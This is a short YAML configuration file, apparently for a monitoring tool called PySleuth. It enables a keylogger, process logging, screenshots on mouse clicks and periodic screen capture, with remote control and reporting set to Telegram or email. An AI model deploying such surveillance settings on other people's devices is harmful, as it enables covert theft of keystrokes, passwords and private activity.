General:
  control-mode: telegram # or email
  monitor-every: 3
  save-data-to: /home/ashwin/github.com/ashwin5059198/PySleuth

Email:
  # ignore if telegram is chosen
  program-email: ""
  admin-email: ""

Telegram: null

Components:
  KeyLogger:
    enable: true

  Process-Monitor:
    enable: true
    log-every: 3

  Mouse-Monitor:
    enable: true
    # take screenshots on mouse clicks/release
    capture-on-activity: true

  Screen-Monitor:
    enable: true
    log-every: 5
